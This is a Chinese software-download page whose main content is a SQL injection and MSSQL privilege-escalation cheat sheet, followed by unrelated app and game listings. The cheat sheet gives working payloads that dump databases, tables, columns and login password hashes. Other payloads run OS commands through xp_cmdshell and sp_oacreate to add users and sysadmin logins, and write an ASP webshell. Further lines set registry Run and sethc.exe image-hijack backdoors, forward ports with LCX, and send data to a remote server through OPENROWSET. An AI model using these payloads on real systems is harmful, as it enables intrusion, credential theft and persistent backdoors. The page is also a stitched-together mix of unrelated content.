1.爆所有库名定时关机小工具-北极熊定时关机软件2.0 绿色版
+union+select+name,filename,3,4,5+from+master.dbo.sysdatabases
//name数据库名filename数据库物理路径
+union+select+name,filename,3,4,5+from+master.dbo.sysdatabases+where+and+dbid=x+filename>0
//爆破数据库路径换dbid值就可以

+union+select+1,(select+name+from+master.dbo.sysdatabases+for+xml+path),3,4,5–
and0<>db_name(n)–
n改成0,1,2,3……就可以跨库
2.爆所有表名
+union+select+table_name,2,3,4,5+TABLE_CAtalog,table_schema+from+information_schema.tables–
//table_catalo保存当前数据库名称,table_name保存当前数据库中所有表
+select+name,id,crdate,4,5+from+数据库名.dbo.sysobjects+where+xtype=’u.+and+status>=0–
//name表名id表的idxtype=’u’u代表用户自定义的表crdate为数据库的创建时间ststus>=0
/+union+select+name,object_id,3,4,5+fromsys.tables–
3.爆所有字段名
+union+select+name,id,3,4,5+from+数据库名称.dbo.syscolumns+where+xtype=167+and+id=5575058–
//id是在爆破表名时候的id值syscolumns中的id和sysobjects中的id主外键关系
+union+select+name+from+syscolumns+where+charindex(‘pass’,name)>0
//查询含有“pass”的字段
+union+SELECTname,2,3,4,5FROMsyscolumnsWHEREid=(SELECTidFROMsysobjectsWHEREname=‘yixiang_bizre’)
//查询yixiang_bizre表中的所有字段
+union+select+table_name,column_name,3,4,5+from+information_schema.COLUMNS–
//table_name表名称column_name字段名
4.添加用户
1、declare@oint;
2、execmaster..sp_oacreate'Shell.Application',@oout;
3、execmaster..sp_oamethod@o,'ShellExecute',NULL,'cmd.exe','/cnetuserfuckfuck/add
5.判断是不是SQL库
andexists(select*fromsysobjects)
6.所有账户名
+union+select+(selectname+’||’+password_hashfrom+sys.sql_loginsforxmlpath),2,3,4,5+from+sys.sql_logins//
7.加SQL账户
1、--创建个登陆mssql的帐号
2、;execmaster.dbo.sp_addloginname,pass;--
3、--把创建的mssql登陆帐号提升到sysadmin
4、;execmaster.dbo.sp_addsrvrolemembername,sysadmin;--
8.启动组写入命令行和执行
EXECmaster.dbo.xp_regwrite‘HKEY_LOCAL_MACHINE’,’SOFTWAREMicrosoftWindowsCurrentVersionRun’,’help1′,’REG_SZ’,’cmd.exe/cnetusertestptlove/add’-
9.LCX语句
;execmaster..xp_cmdshell‘D:m目录lcx.exe-slave本机ip51目标内网ip3389′–
//目标机器执行
lcx.exe-listen512007
//本机执行连接本机的的2007端口就可以了
10.win200爆目录
xp_regread读取HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesW3SVCParametersVirtualRoots–
//获取WEB路径
11.恢复xp_cmdshell
;EXECmaster.dbo.sp_addextendedproc‘xp_cmdshell’,’e:inetpubwwwrootxplog70.dll’
//把xplog70.dll文件给他上传到e:inetpubwwwroot目录下了
12.open数据
insertintoOPENROWSET(‘SQLOLEDB’,‘server=ip;uid=user;pwd=123456!’,‘selectcfromcmd’)selectusernamefromtest
//把test是本地表,中username的值插入到远程cmd表中的c字段里
13.判断权限
1、+and+1=(select+IS_SRVROLEMEMBER('sysadmin'))--
2、//sa权限
3、and(selectIS_MEMBER('db_owner'))=1-- // dbo
4、and(selectIS_MEMBER('public'))=1-- //public
14.DIR目录
遍历系统的目录结构,分析结果并发现WEB虚拟目录,先创建一个临时表:
temphttp://www.XXXX.com/FullStory.asp?id=1;createtabletemp(idnvarchar(255),num1nvarchar(255),num2nvarchar(255),num3nvarchar(255));
–接下来:我们可以利用xp_availablemedia来获得当前所有驱动器,并存入temp表中:http://www.XXXX.com/FullStory.asp?id=1;inserttempexecmaster.dbo.xp_availablemedia;–?我们可以通过查询temp的内容来获得驱动器列表及相关信息或者利用xp_subdirs获得子目录列表,并存入temp表中:http://www.XXXX.com/FullStory.asp?id=1;insertintotemp(id)execmaster.dbo.xp_subdirs‘c:’;–?
我们还可以利用xp_dirtree获得所有子目录的目录树结构,并寸入temp表中:http://www.XXXX.com/FullStory.asp?id=1;insertintotemp(id,num1)execmaster.dbo.xp_dirtree‘c:’;–
这样就可以成功的浏览到所有的目录(文件夹)列表?如果我们需要查看某个文件的内容,可以通过执行xp_cmdsell:;insertintotemp(id)execmaster.dbo.xp_cmdshell‘typec:webindex.asp’;–?
使用’bulkinsert’语法可以将一个文本文件插入到一个临时表中。
如:bulkinserttemp(id)from‘c:inetpubwwwrootindex.asp’浏览temp就可以看到index.asp文件的内容了!通过分析各种ASP文件,可以得到大量系统信息,WEB建设与管理信息,甚至可以得到SA帐号的连接密码。
15.判断站库分离
+and+host_name()==@@servername-- //判断站库是否分离
16.存储总结
xp_availablemedia显示系统上可用的盘符’C:’xp_availablemedia
xp_enumgroups列出当前系统的使用群组及其说明xp_enumgroups
xp_enumdsn列出系统上已经设置好的ODBC数据源名称xp_enumdsn
xp_dirtree显示某个目录下的子目录与文件架构xp_dirtree‘C:inetpubwwwroot’
xp_getfiledetails获取某文件的相关属性xp_getfiledetails‘C:inetpubwwwroot.asp’
dbp.xp_makecab将目标计算机多个档案压缩到某个档案里所压缩的档案都可以接在参数的后面用豆号隔开
dbp.xp_makecab’C:lin.cab’,’evil’,1,’C:inetpubmdb.asp’
xp_unpackcab解压缩xp_unpackcab‘C:hackway.cab’,’C: emp’,1
xp_ntsec_enumdomains列出服务器域名xp_ntsec_enumdomains
xp_servicecontrol停止或者启动某个服务xp_servicecontrol‘stop’,’schedule’
xp_terminate_process用pid来停止某个执行中的程序xp_terminate_process123
dbo.xp_subdirs只列某个目录下的子目录dbo.xp_subdirs‘C:’
17.判断xp_cmdshell
+and+1=(select+count(*)+FROM+master.dbo.sysobjects+where+xtype+=‘X’+AND+name+=‘xp_cmdshell’)
18.判断系统为win2003
And+charindex('5.3',@@verisdn)
19.echo写shell
;execmaster.dbo.xp_cmdshell'echo^<scriptlanguage=VBScriptrunat=server^>executerequest^("^)^</script^>>c:\mu.asp'-
20.停掉服务
execmaster..xp_servicecontrol‘stop’,’schedule’
execmaster..xp_servicecontrol‘start’,’schedule’
有多少删减。另外添加几句个人经常用到的SQL注入和提权的语句
当xp_cmshell被删除或者无法使用的情况,我们不妨试试利用SP_OACreate和SP_OAMETHOD调用系统wscript.shell执行系统命令。
Declare@runshellINT
ExecSP_OACreate‘wscript.shell’,@runshellout
ExecSP_OAMeTHOD@runshell,’run’,null,’netuserlengflengf/add’
当这些都失败了,试试关闭系统沙盒模式,它在注册表的位置是
HKEY_LOCAL_MACHINESoftwareMicrosoftJet4.0EngineSandBoxMode
默认键值为2,即只在Access的模式下开启沙盒模式,对应的键值是
0—在任何所有者中禁止启用安全模式
1–为仅在允许范围内
2–必须在access模式下
3–完全开启
我们要将其设置为0就可以关闭了,通过SQL语句实现
Execmaster.dbo.xp_regwrite‘HKEY_LOCAL_MACHINE,’SoftwareMicrosoftJet4.0Engine’,’SandBoxMode’,’REG_DWORD’,0
执行关闭成功后就可以执行系统命令
select*fromOpenRowSet(‘Microsoft.Jet.OLEDB.4.0′,’;DataBase=c:windowssystem32iasias.mdb’,’selectshell(“netuserlengflengf/add”)’)
上面是提权思路。另外提下两种备份:
(1)Log备份(hta)
alertdatabase[dbname]setRECOVERYFULL–
createtablecmd(aimage)–
backuplog[dbname]todisk=’c:hta’withinit–
insertintocmd(a)values(‘[command]‘)–
backuplog[dbname]todisk=’系统启动目录hello.hta’–
droptablecmd–
(2)差异备份
backupdatabase[dbname]todisk=’c:db.bak’–
createtablecmd(cmdimage)–
insertintocmd(cmd)values(‘[command]‘)–
backupdatabase[dbname]todisk=’系统启动目录hello.hta’WITHDIFFERENTIALFORMAT–
droptablecmd–
经验告诉我,将你要执行的command转换成十六进制成功率会比较高,但是这个比较被动。
另外就是可以通过注册表添加run启动项添加用户命令,这种也是被动,要等服务器重启。
看了这个工具,觉得还缺少一个很使用的方法,那就是映像劫持,位于注册表位置:
HKEY_LOACAL_MACHINESoftwareMicrosoftWindowsNTCurrentVersionImageFileExecutionOptions
在这个键下面有一个Debugger的参数,如果不为空,就会处理。添加映像劫持方法的SQL语句如下:
execMaster.dbo.xp_regWrite‘HKEY_LOACAL_MACHINE’,’Software\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\sethc.exe’,’debugger’,’REG_SZ’,’c:windowssystem32cmd.exe’
菲哥哥注入语句笔记是一款sql注入工具,它可以注入一些要注意的东西,Sql注射经验,写成笔记了。
七乐彩预测分析 彩豪乐彩 乐鱼官方 跑了 九游会赌场直营 ly乐鱼众博展开内容
劳信宝app下载-劳信宝1.3.1 安卓最新版
沧澜幻剑录游戏下载-沧澜幻剑录1.08最新版
欢乐连一连红包版-欢乐连一连最新版0.1福利版
房贷好计算(房贷计算器)安卓版1.0.19 官方最新版
SWF Decompiler Magic V5.2.1.2050 绿色版 (SWF转换编辑)
The Evil Within2游戏3DM免安装中文版硬盘版
左右日记APP下载安装官方版-左右日记1.0.0 最新版
代号灵下载-代号灵公测版1.0手机版
鏖战襄阳1.81无泪破解版-鏖战襄阳1.81无泪破解版【VIP8+VIP7+官方礼包+侠义礼包+飞飞脚本】
3D台球游戏 单机版
交警手势图解-交通警察指挥手势图解doc格式【word版】
彩虹怪兽花园游戏下载-彩虹怪兽花园1.0.1 安卓版
社会实践报告范文免费下载!-大学生社会实践报告范文doc格式免费下载
叮当派app下载-亲子活动社区(叮当派)4.2.1 官网手机版
无尽的怪物 v0.8破解地图下载-无尽的怪物 v0.8破解版【附攻略+技能免cd+隐藏英雄密码】
9.4/1,679.1M
来纸搜索APP其实是一款比较好用的手机检索工具,它致力于为用户打造零干扰的搜索空间,全程无广告弹窗纷扰,更不存在任何形式的隐藏收费项目,让每一次搜索都纯粹、高效...
逃跑吧少年苹果版下载安装-逃跑吧少年ios版本8.34.0 最新版
9.8/1,932.5M
逃跑吧少年苹果和安卓账号不能互通,因此本页面带来了逃跑吧少年苹果专享版本,逃跑吧少年IOS玩家是独自专享一个服务器的,这款经典手游的热度一直以来都很高,三分钟快...
8.8/457.9M
养成制服女友是一款画面卡通可爱的恋爱养成手游,游戏中的女主超好看,你将和她邂逅,产生一段每秒的感情,剧情丰富有趣,感兴趣的小伙伴快来东坡体验吧!养成制服女友游戏...
MagikLab图片处理器手机APP下载-MagikLab图片处理器1.0.0 最新版
10.0/1,434.8M
MagikLab图片处理器APP是一款比较不错的图像处理软件,其中功能丰富,可进行图片裁剪,帮助用户保留喜欢的部分;具备图片美化功能,一键提升图片美感;还能调整...
聚元好车app官方下载-宁波聚元好车电子商务平台1.0.6 安卓手机版
8.0/263.6M
宁波聚元好车电子商务平台是一个专业的卖车电子商务平台,手机上的购车专家,各层次车型都有分析推荐,宁波本地特色汽车服务软件,精心挑选适合用户的车型!购车平台软件!...
天鉴xposed框架下载-天鉴X框架免root最新版100.0 安卓版
9.7/557.0M
天鉴X框架免root最新版是一个应用于游戏的框架软件,软件是直接免root使用的,有了这款软件,大家就可以进行游戏的相关数据的修改,还可以帮助大家提升手机的一些...
2017最后一天说说-2017最后一天的图片说说微信朋友圈版
8.2/994.9M
今天是2017最后一天,你的朋友圈更新了吗?这一年里,你或多或少有一些自己的感悟,来朋友圈发个动态,留个言吧,说不定就成经典语录了。小编带来了2017最后一天的...
8.1/868.4M
瀚想app采用了最新的ar图像技术,提供了丰富的素材,ar红包、名片等,像ppt一样的编辑属于自己的ar内容,可以用手机扫一扫就可以看到精彩的内容了。使用方法有...
有声教程制作-有声教程制作(BlitzSound )3.1 绿色版
8.7/417.9M
BlitzSound是一个简单的应用程序,使它容易在您的计算机上抓取屏幕截图或记录你所听到的。使用方法在系统托盘中运行的程序,你可以简单地按f10键以捕捉你的桌...
云手机精灵APP下载安装官方版-云手机精灵1.0.5.1 最新版
9.0/292.0M
云手机精灵APP是款比较好用的工具软件,通过它,能带给用户一个更加高能的玩机体验,例如它能为用户配备了一台虚拟智能手机,用户仅需拥有网络连接,便能在不同设备上访...
7.5/1,081.3M
狂飙逃亡是一款类似侠盗猎车游戏玩法的手游,玩家驾驶你的汽车在城市街道上狂飙,警察追赶你,你必须逃出一条生路,精彩刺激的飙车逃亡之旅就此开始!狂飙逃亡游戏攻略1、...
7.5/171.5M
将万物结合在一起的区块链全新模式平台,汇通天下app的平台币COL正在空投中,现在用户实名注册后可以获得4800矿池,支持多种方式推广获得奖励,想要了解更多的朋...
YaleHomeAPP下载安装手机版-YaleHome2025.4.0 手机版
8.8/577.8M
作为一款专业安防软件,它通过APP实现远程门锁控制、门前动态实时监控及异常开锁警报,同时无缝联动灯光、摄像头等智能设备构建主动防护体系,配合银行级数据加密技术,...
sketchup2019-SketchUp Pro 2019简体中文版19.0.685 免费版
8.5/1,442.6M
SketchUpPro2019以最直觉的设计方式,能以3D的形式记录并传达您的想法,简化一切流程,从平面图设计的初期到施工管理的结束都是好用的工具。如果你在绘制...
9.9/1,998.0M
字体是现在很多的安卓手机都是喜欢进行更换的,那么现在你找到了一款适合自己的手机更换字体的软件了吗?没有的话就可以试试一键ROOT更换字体大师!一键ROOT更换字...
9.3/1,292.9M
家常菜食谱大全,满足你的食欲需求,厨房小白必备!不需要注册登录,完全免费无广告,打开就有菜谱教程,教程有家常菜、素菜、川菜、汤、下饭菜等等食谱,还有热门排行榜,...
9.2/910.9M
销售精灵app是一款帮助市场销售人员寻找客户的手机软件,拥有丰富的销售工具,大数据,进准获得潜在客户,帮助销售人员展业!销售精灵app介绍“销售精灵”应用大数据...
8.9/263.5M
这款软件是一款非常不错的党建云平台,可以在上面与其他人进行互动交流,查看党建服务信息,轻松的了解党建知识,让党建更加轻松!城西区党建云课堂app介绍“城西区智慧...
9.3/1,182.2M
丧尸派对破解版是一款像素题材的冒险战斗rpg手游。游戏有着丰富的玩法内容,海量的游戏关卡等你来战,玩家将要处理丧尸的危机,多种游戏模式,不同的策略搭配,给你绝佳...
拳皇97ol安锋版下载-拳皇97ol安锋客户端4.6.0安锋安卓版
8.3/1,114.0M
拳皇97ol是由游戏由日本SNK正版授权,超高度还原“拳皇”系列精髓,数十位拳皇角色轮番登场,唤醒童年热血情怀;喜欢这款游戏的朋友就来东坡下载吧。战力提升攻略拳...
7.8/1,398.6M
百度Hi苹果版是最简单的聊天工具,让你可以轻松的进行沟通,适合办公族以及学生族的使用,多种功能,想怎么聊就可以怎么聊,心动就可以来试试!百度Hi苹果版主要功能1...
8.9/1,655.0M
这款软件是一款非常不错的社区类app,使用这个软件你可以与业主进行联系,随时随地知晓小区的各种事情,软件的功能是非常之多的,相信大家都会喜欢!飞梭鱼app介绍智...
8.6/276.4M
这是一款全新的网上相亲交友平台,在这款软件上采用新颖的网上视频相亲模式打造,帮助你能够更有趣的与心动的她进行聊天,告别见面时的尴尬,让你轻松俘获ta的心!对相相...
实习面试自我介绍范文-2018暑期实习面试自我介绍范文doc格式免费下载
7.6/706.3M
暑假已经到了,各位同学们有需要准备相关的暑期实习面试自我介绍的朋友们可以来我们东坡免费的下载这个2016暑期实习面试自我介绍范文,对大家的面试可能会有一定的帮助...
从灵异世界逃脱的少年游戏下载-从灵异世界逃脱的少年(kick skeleton)15.1 安卓版
7.7/292.9M
从灵异世界逃脱的少年是一款有趣的休闲闯关手游,在游戏中玩家操控少年向上逃脱,一路上有很多障碍与危险,你必须一一客服才能成功逃脱,玩起来非常有趣,感兴趣的小伙伴快...